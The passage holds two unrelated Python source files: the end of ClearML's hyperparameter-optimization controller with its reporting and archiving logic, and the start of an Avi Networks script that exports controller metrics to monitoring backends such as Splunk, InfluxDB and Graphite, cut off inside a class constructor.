:param int top_k: The number of Tasks (experiments) to return.
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
if not self.optimizer:
return []
return self.optimizer.get_top_experiments(top_k=top_k)
def get_optimizer(self):
# type: () -> SearchStrategy
"""
Return the currently used optimizer object.
:return: The SearchStrategy object used.
"""
return self.optimizer
def set_default_job_class(self, job_class):
# type: (ClearmlJob) -> ()
"""
Set the Job class to use when the optimizer spawns new Jobs.
:param ClearmlJob job_class: The Job Class type.
"""
self.optimizer.set_job_class(job_class)
def set_report_period(self, report_period_minutes):
# type: (float) -> ()
"""
Set reporting period for the accumulated objective report (minutes). This report is sent on the Optimizer Task,
and collects the Objective metric from all running jobs.
:param float report_period_minutes: The reporting period (minutes). The default is once every 10 minutes.
"""
self._report_period_min = float(report_period_minutes)
@classmethod
def get_optimizer_top_experiments(
cls,
objective_metric_title, # type: str
objective_metric_series, # type: str
objective_metric_sign, # type: str
optimizer_task_id, # type: str
top_k, # type: int
):
# type: (...) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments
for a specific HyperParameter Optimization session (i.e. Task ID), based on the title/series objective.
:param str objective_metric_title: The Objective metric title to maximize / minimize (for example,
``validation``).
:param str objective_metric_series: The Objective metric series to maximize / minimize (for example, ``loss``).
:param str objective_metric_sign: The objective to maximize / minimize.
The values are:
- ``min`` - Minimize the last reported value for the specified title/series scalar.
- ``max`` - Maximize the last reported value for the specified title/series scalar.
- ``min_global`` - Minimize the min value of *all* reported values for the specific title/series scalar.
- ``max_global`` - Maximize the max value of *all* reported values for the specific title/series scalar.
:param str optimizer_task_id: Parent optimizer Task ID
:param top_k: The number of Tasks (experiments) to return.
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
objective = Objective(
title=objective_metric_title, series=objective_metric_series, order=objective_metric_sign)
return objective.get_top_tasks(top_k=top_k, optimizer_task_id=optimizer_task_id)
def _connect_args(self, optimizer_class=None, hyper_param_configuration=None, **kwargs):
# type: (SearchStrategy, dict, Any) -> (SearchStrategy, list, dict)
if not self._task:
logger.warning('Auto Connect turned on but no Task was found, '
'hyper-parameter optimization argument logging disabled')
return optimizer_class, hyper_param_configuration, kwargs
configuration_dict = {'parameter_optimization_space': [c.to_dict() for c in hyper_param_configuration]}
self._task.connect_configuration(configuration_dict)
# this is the conversion back magic:
configuration_dict = {'parameter_optimization_space': [
Parameter.from_dict(c) for c in configuration_dict['parameter_optimization_space']]}
complex_optimizer_kwargs = None
if 'optimizer_kwargs' in kwargs:
# do not store complex optimizer kwargs:
optimizer_kwargs = kwargs.pop('optimizer_kwargs', {})
complex_optimizer_kwargs = {
k: v for k, v in optimizer_kwargs.items()
if not isinstance(v, six.string_types + six.integer_types +
(six.text_type, float, list, tuple, dict, type(None)))}
kwargs['optimizer_kwargs'] = {
k: v for k, v in optimizer_kwargs.items() if k not in complex_optimizer_kwargs}
# skip non basic types:
arguments = {'opt': kwargs}
if type(optimizer_class) != type:
logger.warning('Auto Connect optimizer_class disabled, {} is already instantiated'.format(optimizer_class))
self._task.connect(arguments)
else:
arguments['opt']['optimizer_class'] = str(optimizer_class).split('.')[-1][:-2] \
if not isinstance(optimizer_class, str) else optimizer_class
self._task.connect(arguments)
# this is the conversion back magic:
original_class = optimizer_class
optimizer_class = arguments['opt'].pop('optimizer_class', None)
if optimizer_class == 'RandomSearch':
optimizer_class = RandomSearch
elif optimizer_class == 'GridSearch':
optimizer_class = GridSearch
elif optimizer_class == 'OptimizerBOHB':
from .hpbandster import OptimizerBOHB
optimizer_class = OptimizerBOHB
elif optimizer_class == 'OptimizerOptuna':
from .optuna import OptimizerOptuna
optimizer_class = OptimizerOptuna
else:
logger.warning("Could not resolve optimizer_class {} reverting to original class {}".format(
optimizer_class, original_class))
optimizer_class = original_class
if complex_optimizer_kwargs:
if 'optimizer_kwargs' not in arguments['opt']:
arguments['opt']['optimizer_kwargs'] = complex_optimizer_kwargs
else:
arguments['opt']['optimizer_kwargs'].update(complex_optimizer_kwargs)
return optimizer_class, configuration_dict['parameter_optimization_space'], arguments['opt']
def _daemon(self):
# type: () -> ()
"""
Implement the main pooling thread, calling loop every ``self.pool_period_minutes`` minutes.
"""
self.optimizer.start()
self._thread = None
def _report_daemon(self):
# type: () -> ()
title, series = self.objective_metric.get_objective_metric()
title = '{}/{}'.format(title, series)
counter = 0
completed_jobs = dict()
task_logger = None
cur_completed_jobs = set()
cur_task = self._task or Task.current_task()
if cur_task and self.optimizer:
# noinspection PyProtectedMember
child_tasks = self.optimizer._get_child_tasks(
parent_task_id=cur_task.id, status=['completed', 'stopped'])
hyper_parameters = [h.name for h in self.hyper_parameters]
for task in child_tasks:
params = {k: v for k, v in task.get_parameters().items() if k in hyper_parameters}
params["status"] = str(task.status)
# noinspection PyProtectedMember
iteration_value = task.get_last_iteration()
objective = self.objective_metric.get_objective(task)
completed_jobs[task.id] = (
objective if objective is not None else -1,
iteration_value if iteration_value is not None else -1,
params
)
while self._thread is not None:
timeout = self.optimization_timeout - time() if self.optimization_timeout else 0.
if timeout >= 0:
timeout = min(self._report_period_min * 60., timeout if timeout else self._report_period_min * 60.)
# make sure that we have the first report fired before we actually go to sleep, wait for 15 sec.
if counter <= 0:
timeout = 15
print('Progress report #{} completed, sleeping for {} minutes'.format(counter, timeout / 60.))
if self._stop_event.wait(timeout=timeout):
# wait for one last report
timeout = -1
counter += 1
# get task to report on.
cur_task = self._task or Task.current_task()
if cur_task:
task_logger = cur_task.get_logger()
# do some reporting
self._report_remaining_budget(task_logger, counter)
if self.optimizer.budget.compute_time.used and self.optimizer.budget.compute_time.used >= 1.0:
# Reached compute time limit
timeout = -1
self._report_resources(task_logger, counter)
# collect a summary of all the jobs and their final objective values
cur_completed_jobs = set(self.optimizer.get_created_jobs_ids().keys()) - \
{j.task_id() for j in self.optimizer.get_running_jobs()}
self._report_completed_status(completed_jobs, cur_completed_jobs, task_logger, title)
self._report_completed_tasks_best_results(set(completed_jobs.keys()), task_logger, title, counter)
self._auto_archive_low_performance_tasks(completed_jobs)
# if we should leave, stop everything now.
if timeout < 0:
# we should leave
self.stop(wait_for_reporter=False)
return
if task_logger and counter:
counter += 1
self._report_remaining_budget(task_logger, counter)
self._report_resources(task_logger, counter)
self._report_completed_status(completed_jobs, cur_completed_jobs, task_logger, title, force=True)
self._report_completed_tasks_best_results(set(completed_jobs.keys()), task_logger, title, counter)
self._auto_archive_low_performance_tasks(completed_jobs)
def _report_completed_status(self, completed_jobs, cur_completed_jobs, task_logger, title, force=False):
job_ids_sorted_by_objective = self.__sort_jobs_by_objective(completed_jobs)
best_experiment = \
(self.objective_metric.get_normalized_objective(job_ids_sorted_by_objective[0]),
job_ids_sorted_by_objective[0]) \
if job_ids_sorted_by_objective else (float('-inf'), None)
if force or cur_completed_jobs != set(completed_jobs.keys()):
pairs = []
labels = []
created_jobs = copy(self.optimizer.get_created_jobs_ids())
created_jobs_tasks = self.optimizer.get_created_jobs_tasks()
id_status = {j_id: j_run.status() for j_id, j_run in created_jobs_tasks.items()}
for i, (job_id, params) in enumerate(created_jobs.items()):
value = self.objective_metric.get_objective(job_id)
if job_id in completed_jobs:
if value != completed_jobs[job_id][0]:
iteration_value = self.objective_metric.get_current_raw_objective(job_id)
completed_jobs[job_id] = (
value,
iteration_value[0] if iteration_value else -1,
copy(dict(**params, **{"status": id_status.get(job_id)}))) # noqa
elif completed_jobs.get(job_id):
completed_jobs[job_id] = (completed_jobs[job_id][0],
completed_jobs[job_id][1],
copy(dict(**params, **{"status": id_status.get(job_id)}))) # noqa
pairs.append((i, completed_jobs[job_id][0]))
labels.append(str(completed_jobs[job_id][2])[1:-1])
elif value is not None:
pairs.append((i, value))
labels.append(str(params)[1:-1])
iteration_value = self.objective_metric.get_current_raw_objective(job_id)
completed_jobs[job_id] = (
value,
iteration_value[0] if iteration_value else -1,
copy(dict(**params, **{"status": id_status.get(job_id)}))) # noqa
# callback new experiment completed
if self._experiment_completed_cb:
normalized_value = self.objective_metric.get_normalized_objective(job_id)
if normalized_value is not None and normalized_value > best_experiment[0]:
best_experiment = normalized_value, job_id
c = completed_jobs[job_id]
self._experiment_completed_cb(job_id, c[0], c[1], c[2], best_experiment[1])
if pairs:
print('Updating job performance summary plot/table')
# update scatter plot
task_logger.report_scatter2d(
title='Optimization Objective', series=title,
scatter=pairs, iteration=0, labels=labels,
mode='markers', xaxis='job #', yaxis='objective')
# update summary table
job_ids = list(completed_jobs.keys())
job_ids_sorted_by_objective = sorted(
job_ids, key=lambda x: completed_jobs[x][0], reverse=bool(self.objective_metric.sign >= 0))
# sort the columns except for 'objective', 'iteration'
columns = list(sorted(set([c for k, v in completed_jobs.items() for c in v[2].keys()])))
# add the index column (task id) and the first two columns 'objective', 'iteration' then the rest
table_values = [['task id', 'objective', 'iteration'] + columns]
table_values += \
[([job, completed_jobs[job][0], completed_jobs[job][1]] +
[completed_jobs[job][2].get(c, '') for c in columns]) for job in job_ids_sorted_by_objective]
# create links for task id in the table
task_link_template = self._task.get_output_log_web_page() \
.replace('/{}/'.format(self._task.project), '/{project}/') \
.replace('/{}/'.format(self._task.id), '/{task}/')
# create links for task id in the table
table_values_with_links = deepcopy(table_values)
for i in range(1, len(table_values_with_links)):
task_id = table_values_with_links[i][0]
project_id = created_jobs_tasks[task_id].task.project \
if task_id in created_jobs_tasks else '*'
table_values_with_links[i][0] = '<a href="{}"> {} </a>'.format(
task_link_template.format(project=project_id, task=task_id), task_id)
task_logger.report_table(
"summary", "job", 0, table_plot=table_values_with_links,
extra_layout={"title": "objective: {}".format(title)})
# Build parallel Coordinates: convert to columns, and reorder accordingly
if len(table_values) > 1:
table_values_columns = [[row[i] for row in table_values] for i in range(len(table_values[0]))]
table_values_columns = \
[[table_values_columns[0][0]] + [c[:6]+'...' for c in table_values_columns[0][1:]]] + \
table_values_columns[2:-1] + [[title]+table_values_columns[1][1:]]
pcc_dims = []
for col in table_values_columns:
# test if all values are numbers:
try:
# try to cast all values to float
values = [float(v) for v in col[1:]]
d = dict(label=col[0], values=values)
except (ValueError, TypeError):
values = list(range(len(col[1:])))
ticks = col[1:]
d = dict(label=col[0], values=values, tickvals=values, ticktext=ticks)
pcc_dims.append(d)
# report parallel coordinates
plotly_pcc = dict(
data=[dict(
type='parcoords',
line=dict(colorscale='Viridis',
reversescale=bool(self.objective_metric.sign >= 0),
color=table_values_columns[-1][1:]),
dimensions=pcc_dims)],
layout={})
task_logger.report_plotly(
title='Parallel Coordinates', series='',
iteration=0, figure=plotly_pcc)
# upload summary as artifact
if force:
task = self._task or Task.current_task()
if task:
task.upload_artifact(name='summary', artifact_object={'table': table_values})
def _report_remaining_budget(self, task_logger, counter):
# noinspection PyBroadException
try:
budget = self.optimizer.budget.to_dict()
except Exception:
budget = {}
# report remaining budget
for budget_part, value in budget.items():
task_logger.report_scalar(
title='remaining budget', series='{} %'.format(budget_part),
iteration=counter, value=round(100 - value['used'] * 100., ndigits=1))
if self.optimization_timeout and self.optimization_start_time:
task_logger.report_scalar(
title='remaining budget', series='time %',
iteration=counter,
value=round(100 - (100. * (time() - self.optimization_start_time) /
(self.optimization_timeout - self.optimization_start_time)), ndigits=1)
)
def _report_completed_tasks_best_results(self, completed_jobs, task_logger, title, counter):
# type: (Set[str], Logger, str, int) -> ()
if not completed_jobs:
return
value_func, series_name = (max, "max") if self.objective_metric.get_objective_sign() > 0 else \
(min, "min")
latest_completed, obj_values = self._get_latest_completed_task_value(completed_jobs, series_name)
if latest_completed:
val = value_func(obj_values)
task_logger.report_scalar(
title=title,
series=series_name,
iteration=counter,
value=val)
task_logger.report_scalar(
title=title,
series="last reported",
iteration=counter,
value=latest_completed)
def _report_resources(self, task_logger, iteration):
# type: (Logger, int) -> ()
self._report_active_workers(task_logger, iteration)
self._report_tasks_status(task_logger, iteration)
def _report_active_workers(self, task_logger, iteration):
# type: (Logger, int) -> ()
res = self.__get_session().send(workers_service.GetAllRequest())
response = res.wait()
if response.ok():
all_workers = response
queue_workers = len(
[
worker.get("id")
for worker in all_workers.response_data.get("workers")
for q in worker.get("queues")
if q.get("name") == self.execution_queue
]
)
task_logger.report_scalar(title="resources",
series="queue workers",
iteration=iteration,
value=queue_workers)
def _report_tasks_status(self, task_logger, iteration):
# type: (Logger, int) -> ()
tasks_status = {"running tasks": 0, "pending tasks": 0}
for job in self.optimizer.get_running_jobs():
if job.is_running():
tasks_status["running tasks"] += 1
else:
tasks_status["pending tasks"] += 1
for series, val in tasks_status.items():
task_logger.report_scalar(
title="resources", series=series,
iteration=iteration, value=val)
def _get_latest_completed_task_value(self, cur_completed_jobs, series_name):
# type: (Set[str], str) -> (float, List[float])
completed_value = None
latest_completed = None
obj_values = []
cur_task = self._task or Task.current_task()
for j in cur_completed_jobs:
res = cur_task.send(tasks_service.GetByIdRequest(task=j))
response = res.wait()
if not response.ok() or response.response_data["task"].get("status") != Task.TaskStatusEnum.completed:
continue
completed_time = datetime.strptime(response.response_data["task"]["completed"].partition("+")[0],
"%Y-%m-%dT%H:%M:%S.%f")
completed_time = completed_time.timestamp()
completed_values = self._get_last_value(response)
obj_values.append(completed_values['max_value'] if series_name == "max" else completed_values['min_value'])
if not latest_completed or completed_time > latest_completed:
latest_completed = completed_time
completed_value = completed_values['value']
return completed_value, obj_values
def _get_last_value(self, response):
metrics, title, series, values = ClearmlJob.get_metric_req_params(self.objective_metric.title,
self.objective_metric.series)
last_values = response.response_data["task"]['last_metrics'][title][series]
return last_values
def _auto_archive_low_performance_tasks(self, completed_jobs):
if self._save_top_k_tasks_only <= 0:
return
# sort based on performance
job_ids_sorted_by_objective = self.__sort_jobs_by_objective(completed_jobs)
# query system_tags only
res = self.__get_session().send(tasks_service.GetAllRequest(
id=job_ids_sorted_by_objective, status=['completed', 'stopped'], only_fields=['id', 'system_tags']))
response = res.wait()
if not response.ok():
return
tasks_system_tags_lookup = {
task.get("id"): task.get("system_tags") for task in response.response_data.get("tasks")}
for i, task_id in enumerate(job_ids_sorted_by_objective):
system_tags = tasks_system_tags_lookup.get(task_id, [])
if i < self._save_top_k_tasks_only and Task.archived_tag in system_tags:
print('Restoring from archive Task id={} (#{} objective={})'.format(
task_id, i, completed_jobs[task_id][0]))
# top_k task and is archived, remove archive tag
system_tags = list(set(system_tags) - {Task.archived_tag})
res = self.__get_session().send(
tasks_service.EditRequest(task=task_id, system_tags=system_tags, force=True))
res.wait()
elif i >= self._save_top_k_tasks_only and Task.archived_tag not in system_tags:
print('Archiving Task id={} (#{} objective={})'.format(
task_id, i, completed_jobs[task_id][0]))
# Not in top_k task and not archived, add archive tag
system_tags = list(set(system_tags) | {Task.archived_tag})
res = self.__get_session().send(
tasks_service.EditRequest(task=task_id, system_tags=system_tags, force=True))
res.wait()
def __get_session(self):
cur_task = self._task or Task.current_task()
if cur_task:
return cur_task.default_session
# noinspection PyProtectedMember
return Task._get_default_session()
def __sort_jobs_by_objective(self, completed_jobs):
if not completed_jobs:
return []
job_ids_sorted_by_objective = list(sorted(
completed_jobs.keys(), key=lambda x: completed_jobs[x][0], reverse=bool(self.objective_metric.sign >= 0)))
return job_ids_sorted_by_objective
|
metricscollection.py
|
#!/opt/local/bin/python3
version = 'v2019-12-20'
#########################################################################################
# #
# #
# #
# REQUIREMENTS: #
# 1. python 3.6+ #
# 2. python3 requests #
# 2. python3 yaml #
# #
# #
# #
# #
# @author: Matthew Karnowski (mkarnowski@avinetworks.com) #
# #
# #
# #
#########################################################################################
#########################################################################################
#----- Import Libraries
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import json
import yaml
import time
import syslog
import socket
from multiprocessing import Process
from datetime import datetime
import base64
import logging
import traceback
import sys
import os
import _pickle as pickle
import socket
from requests.auth import HTTPBasicAuth
#---------------------------------------------------------------
#--------------- Metrics Endpoint functions Begin --------------
#---------------------------------------------------------------
#----- Send value to appdynamics
def send_value_appdynamics_machine(endpoint_info, appd_payload):
try:
for entry in appd_payload:
if 'name_space' in entry:
name_space = entry['name_space'].replace('||','|')
#----- used for migration from old script
if 'host_location' and 'host_environment' in entry:
name_space = name_space.replace('avi.', 'avi.'+entry['host_location']+'.'+entry['host_environment']+'.')
print('name=Custom Metrics|%s,value=%d,aggregator=OBSERVATION,time-rollup=CURRENT,cluster-rollup=INDIVIDUAL' % (name_space, long(entry['metric_value'])))
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
#----- this is to send to appdynamics machine agent http listener
def send_value_appdynamics_http(endpoint_info, appd_payload):
try:
payload = []
for entry in appd_payload:
if 'name_space' in entry:
name_space = entry['name_space'].replace('||','|')
#----- used for migration from old script
if 'host_location' and 'host_environment' in entry:
name_space = name_space.replace('avi.', 'avi.'+entry['host_location']+'.'+entry['host_environment']+'.')
temp_payload = {}
temp_payload['metricName'] = 'Custom Metrics|'+name_space
temp_payload['aggregatorType'] = 'OBSERVATION'
temp_payload['value'] = long(entry['metric_value'])
payload.append(temp_payload)
if len(payload) > 0:
headers = ({'content-type': 'application/json'})
resp = requests.post('http://%s:%s/api/v1/metrics' %(endpoint_info['server'],endpoint_info['server_port']),headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code != 204:
print(resp)
#if resp.status_code != 202:
# print resp
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to datadog
def send_value_datadog(endpoint_info, datadog_payload):
try:
keys_to_remove=["avicontroller","timestamp","metric_value","metric_name","name_space"]
series_list = []
datadog_payload_template = {
"metric":"",
"points":"",
"host":"",
"tags":""
}
for entry in datadog_payload:
temp_payload = datadog_payload_template.copy()
temp_payload['metric'] = entry['metric_name']
temp_payload['points'] = [[entry['timestamp'],entry['metric_value']]]
temp_payload['host'] = entry['avicontroller']
#for k in keys_to_remove:
# entry.pop(k, None)
tag_list = []
for e in entry:
if e not in keys_to_remove:
tag_list.append(str(e+':'+entry[e]))
temp_payload['tags'] = tag_list
series_list.append(temp_payload)
payload = {'series': series_list}
headers = ({'content-type': 'application/json'})
resp = requests.post('https://%s%s' %(endpoint_info['api_url'],endpoint_info['api_key']), verify=False, headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code != 202:
print(resp)
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to elasticsearch
def send_value_elasticsearch(endpoint_info, payload):
try:
keys_to_remove = ['name_space']
for entry in payload:
for k in keys_to_remove:
entry.pop(k,None)
entry[endpoint_info['timestamp']] = time.strftime("%Y-%m-%dT%H:%M:%S", time.localtime())
entry['metric_value'] = float(entry['metric_value'])
headers = ({'content-type': 'application/json'})
if str(endpoint_info['auth-enabled']).lower() == 'true':
resp = requests.post('%s://%s:%s/%s/_doc' %(endpoint_info['protocol'],endpoint_info['server'], endpoint_info['server_port'], endpoint_info['index']) ,headers = headers, data=json.dumps(entry), timeout=15, auth=(endpoint_info['username'],endpoint_info['password']))
else:
resp = requests.post('%s://%s:%s/%s/_doc' %(endpoint_info['protocol'],endpoint_info['server'], endpoint_info['server_port'], endpoint_info['index']) ,headers = headers, data=json.dumps(entry), timeout=15)
if resp.status_code != 201:
print(resp.text)
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to graphite
def send_value_graphite(endpoint_info, graphite_payload):
try:
message_list = []
name_space_prefix = 'network-script||'
for entry in graphite_payload:
if 'name_space' in entry:
name_space = (name_space_prefix+entry['name_space']).replace('.','_').replace('||','.').replace(' ','_')
#----- used for migration from old script
if 'host_location' and 'host_environment' in entry:
name_space = name_space.replace('avi.', 'avi.'+entry['host_location']+'.'+entry['host_environment']+'.')
message_list.append('%s %f %d' %(name_space, entry['metric_value'], entry['timestamp']))
#----- I believe there is a message list limit on graphite for plain text
if sys.getsizeof(message_list) > 4915:
message = '\n'.join(message_list) + '\n'
socket.setdefaulttimeout(10)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((endpoint_info['server'], endpoint_info['server_port']))
sock.send(message.encode())
sock.close()
message_list = []
if len(message_list) > 0:
message = '\n'.join(message_list) + '\n'
socket.setdefaulttimeout(10)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((endpoint_info['server'], endpoint_info['server_port']))
sock.send(message.encode())
sock.close()
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
print(message)
#----- Send value to influxdb
def send_value_influxdb(endpoint_info, influx_payload):
try:
tag_to_ignore = ['metric_name', 'timestamp', 'metric_value','name_space']
if endpoint_info.get('metric_prefix') == None:
metric_prefix = ''
else:
metric_prefix = endpoint_info['metric_prefix']
message_list = []
auth_enabled = False
if 'auth-enabled' in endpoint_info:
if str(endpoint_info['auth-enabled']).lower() == 'true':
auth_enabled = True
for entry in influx_payload:
tag_list=[]
for k in entry:
if k not in tag_to_ignore:
tag_list.append((k+'='+entry[k]).replace(' ', '\\'))
tag_list = ','.join(tag_list)
temp_payload='%s%s,%s value=%f' %(metric_prefix, entry['metric_name'],tag_list,entry['metric_value'])
message_list.append(temp_payload)
if sys.getsizeof(message_list) > 4915:
message = '\n'.join(message_list) + '\n'
headers = ({'content-type': 'octet-stream'})
if auth_enabled == True:
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15, auth=(endpoint_info['username'],endpoint_info['password']))
message_list = []
else:
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15)
message_list = []
if resp.status_code == 401:
print(str(datetime.now())+' '+endpoint_info['server']+': UNAUTHORIZED')
elif resp.status_code == 403:
print(str(datetime.now())+' '+endpoint_info['server']+': FORBIDDEN')
message = '\n'.join(message_list) + '\n'
headers = ({'content-type': 'octet-stream'})
if str(endpoint_info['auth-enabled']).lower() == 'true':
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15, auth=(endpoint_info['username'],endpoint_info['password']))
else:
resp = requests.post('%s://%s:%s/write?db=%s' %(endpoint_info['protocol'],endpoint_info['server'],endpoint_info['server_port'],endpoint_info['db']),verify=False,headers = headers, data=message, timeout=15)
if resp.status_code == 401:
print(str(datetime.now())+' '+endpoint_info['server']+': UNAUTHORIZED')
elif resp.status_code == 403:
print(str(datetime.now())+' '+endpoint_info['server']+': FORBIDDEN')
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to logstash
def send_value_logstash(endpoint_info, payload):
try:
keys_to_remove = ['name_space','timestamp']
proto = 'udp'
if endpoint_info.get('protocol') != None:
if endpoint_info['protocol'].lower() == 'tcp':
proto = 'tcp'
if proto == 'udp':
for entry in payload:
udpsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for k in keys_to_remove:
entry.pop(k,None)
message = '\n'+(json.dumps(entry))+'\n'
udpsock.sendto(message.encode(),(endpoint_info['server'],endpoint_info['server_port']))
udpsock.close()
else:
message_list = []
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.connect((endpoint_info['server'], endpoint_info['server_port']))
socket.setdefaulttimeout(10)
for entry in payload:
for k in keys_to_remove:
entry.pop(k,None)
message_list.append(json.dumps(entry))
if sys.getsizeof(message_list) > 1450:
message = '\n'.join(message_list) + '\n'
tcpsock.send(message.encode())
message_list = []
message = '\n'.join(message_list) + '\n'
tcpsock.send(message.encode())
tcpsock.close()
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to splunk HEC - destination is a metric index
def send_value_splunk_hec_metric(endpoint_info, splunk_payload):
try:
splunk_payload_template = {
"source": "avi",
"event" : "metric",
"index": endpoint_info['index'],
"time": "",
"host": "",
"fields": {
"service": "avi",
"environment": "",
"_value": "",
"location": "",
"metric_name": ""
}
}
hec_token = endpoint_info['hec_token']
headers = ({'Authorization': 'Splunk '+hec_token})
for entry in splunk_payload:
temp_entry = entry
keys_to_remove=["location","environment","avicontroller","timestamp","metric_value","metric_name","name_space"]
payload = splunk_payload_template.copy()
payload['host'] = temp_entry['avicontroller']
payload['time'] = temp_entry['timestamp']
payload['fields']['environment'] = temp_entry['environment']
payload['fields']['location'] = temp_entry['location']
payload['fields']['_value'] = temp_entry['metric_value']
payload['fields']['metric_name'] = temp_entry['metric_name']
for k in keys_to_remove:
entry.pop(k, None)
for e in entry:
payload["fields"][e]=entry[e]
resp = requests.post('%s://%s:%s/services/collector/event' %(endpoint_info['hec_protocol'], endpoint_info['server'], str(endpoint_info['hec_port'])) , verify=False, headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code == 400:
print(payload)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
print(entry)
#----- Send value to splunk HEC
def send_value_splunk_hec(endpoint_info, splunk_payload):
try:
splunk_payload_template = {
#"source": "",
"time": "",
"host": "",
"index": endpoint_info['index'],
"sourcetype": "avi:metrics",
"event": {
"avi_controller": ""
}
}
hec_token = endpoint_info['hec_token']
headers = ({'Authorization': 'Splunk '+hec_token})
for entry in splunk_payload:
temp_entry = entry
keys_to_remove=["avicontroller","name_space"]
payload = splunk_payload_template.copy()
payload['host'] = temp_entry['avicontroller']
#payload['source'] = temp_entry['avicontroller']
payload['time'] = temp_entry['timestamp']
payload['sourcetype'] = 'avi:metrics'
payload['event']['avi_controller'] = temp_entry['avicontroller']
for k in keys_to_remove:
entry.pop(k, None)
for e in entry:
payload["event"][e]=entry[e]
resp = requests.post('%s://%s:%s/services/collector/event' %(endpoint_info['hec_protocol'], endpoint_info['server'], str(endpoint_info['hec_port'])) , verify=False, headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code == 400:
print(resp.text)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
print(entry)
def send_value_wavefront(endpoint_info, payload):
try:
keys_to_remove = ['name_space','timestamp','metric_name','metric_value']
message_list = []
if endpoint_info.get('api_key') != None:
wf_key = endpoint_info['api_key']
wf_proxy = False
else:
wf_proxy = True
if 'proxy_port' in endpoint_info:
wf_proxy_port = endpoint_info['proxy_port']
else:
wf_proxy_port = 2878
wf_instance = endpoint_info['instance']
for m in payload:
tag_list = []
metric_name = m['metric_name']
metric_value = m['metric_value']
for r in keys_to_remove:
m.pop(r, None)
for k,v in m.items():
tag_list.append(k+'="'+v+'"')
tag_list = (' '.join(tag_list))
metric = '%s %f source=%s %s' %(metric_name, metric_value, m['avicontroller'], tag_list)
message_list.append(metric)
message = '\n'.join(message_list)
if wf_proxy == False:
headers = ({'Authorization': 'Bearer '+wf_key, 'content-type': 'application/x-www-form-urlencoded'})
resp = requests.post('https://'+wf_instance+'/report', verify=False, headers = headers, data=message, timeout=15)
if resp.status_code != 202:
print('======> ERROR: send_to_wavefront', resp.status_code, resp.text)
#else:
# print(str(datetime.now())+' ======> Metrics sent to wavefront')
else:
try:
socket.setdefaulttimeout(10)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((wf_instance, wf_proxy_port))
sock.send(message.encode())
sock.close()
#print(str(datetime.now())+' ======> Metrics sent to wavefront')
except:
print(str(datetime.now())+' =====> ERROR: func send_to_wavefront encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
except:
exception_text = traceback.format_exc()
print(exception_text)
#---------------------------------
def send_metriclist_to_endpoint(endpoint_list, payload):
try:
if endpoint_list != None:
for endpoint_info in endpoint_list:
if endpoint_info['type'] == 'graphite':
send_value_graphite(endpoint_info, payload)
elif endpoint_info['type'] == 'splunk':
if endpoint_info['index_type'].lower() == 'metric':
send_value_splunk_hec_metric(endpoint_info, payload)
else:
send_value_splunk_hec(endpoint_info, payload)
elif endpoint_info['type'] == 'appdynamics_http':
send_value_appdynamics_http(endpoint_info, payload)
elif endpoint_info['type'] == 'appdynamics_machine':
send_value_appdynamics_machine(endpoint_info, payload)
elif endpoint_info['type'] == 'datadog':
send_value_datadog(endpoint_info, payload)
elif endpoint_info['type'] == 'influxdb':
send_value_influxdb(endpoint_info, payload)
elif endpoint_info['type'] == 'logstash':
send_value_logstash(endpoint_info, payload)
elif endpoint_info['type'] == 'elasticsearch':
send_value_elasticsearch(endpoint_info, payload)
elif endpoint_info['type'] == 'wavefront':
send_value_wavefront(endpoint_info, payload)
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Determine Metrics Endpoint Type Info
def determine_endpoint_type(configuration):
endpoint_types = [
'graphite',
'appdynamics_http',
'appdynamics_machine',
'splunk',
'datadog',
'influxdb',
'logstash',
'elasticsearch',
'wavefront'
]
endpoint_list = []
for a in configuration:
if a['type'].lower() in endpoint_types and a['enable'] == True:
endpoint_info = a
endpoint_info['type'] = a['type'].lower()
endpoint_list.append(endpoint_info)
if len(endpoint_list) == 0:
print('=====> No end point will be used')
print(endpoint_list)
return endpoint_list
#---------------------------------------------------------------
#---------------- Metrics Endpoint functions END ---------------
#---------------------------------------------------------------
#----- This function allows for passwords to be either plaintext or base64 encoded
def isBase64(password):
try:
if base64.b64encode(base64.b64decode(password)).decode('utf-8') == password:
if all(ord(c) < 128 for c in base64.b64decode(password).decode('utf-8')):
return base64.b64decode(password).decode('utf-8')
else:
return password
else:
return password
except Exception:
return password
#----- This class is where all the test methods/functions exist and are executed
class avi_metrics():
def __init__(self,avi_controller,avi_cluster_name, avi_user, avi_pass, controller_config):
self.avi_cluster_ip = avi_controller
self.avi_cluster_name = avi_cluster_name
self.avi_user = avi_user
self.avi_pass = avi_pass
self.controller_config = controller_config
#------ Default Metric Payload Template
self.payload_template = {}
#self.payload_template['location'] = self.host_location
#self.payload_template['environment'] = self.host_environment
